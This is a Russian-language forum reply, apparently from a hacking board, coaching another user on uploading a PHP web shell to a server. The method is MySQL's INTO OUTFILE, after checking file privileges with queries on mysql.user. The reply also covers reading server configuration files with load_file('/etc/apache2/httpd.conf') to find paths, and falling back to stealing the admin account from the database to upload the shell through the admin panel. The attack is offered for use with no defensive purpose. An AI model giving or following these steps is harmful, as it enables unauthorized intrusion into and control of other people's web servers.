Сообщение от
KENT1994
SELECT shell FROM `SS_id` INTO OUTFILE '/images/shell.php'; так?
Ну я не знаю какой у тебя путь, это тебе виднее. Если ты это прописал рандомом, то вероятно не так.
А если ты прочитал конфиги через load_file или нашел раскрытие путей, то так.
У тебя вообще права есть на чтение и запись файлов?
Что то я уже начал сомневаться, судя по ошибке, что ты выложил, а потом удалил.
Сделай запрос в phpmyadmin
Код HTML:
SELECT user() FROM mysql.user
выдаст тебе юзера, под которым работает БД
Потом сделай запрос
Код HTML:
SELECT file_priv FROM mysql.user WHERE user = 'имя юзера'
Если получишь Y, значит права есть. Следовательно, ты можешь читать файлы через load_file() и писать в них, дальше попробуй прочитать конфиги сервера.
Код HTML:
SELECT load_file('/etc/apache2/httpd.conf')
и тд, там ты найдешь путь.
Стандартные пути для файлов конфигурации, ты можешь найти по ссылке /thread49775-Default.html
Либо ищи раскрытие путей.
Некоторые варианты, как это можно сделать описаны мной вот тут /showpost.php?p=2324984&postcount=4
Какая вообще твоя цель? Шелл залить? Ты можешь достать из базы акк админа и попробывать залить через админку. Как это сделать обсуждалось выше.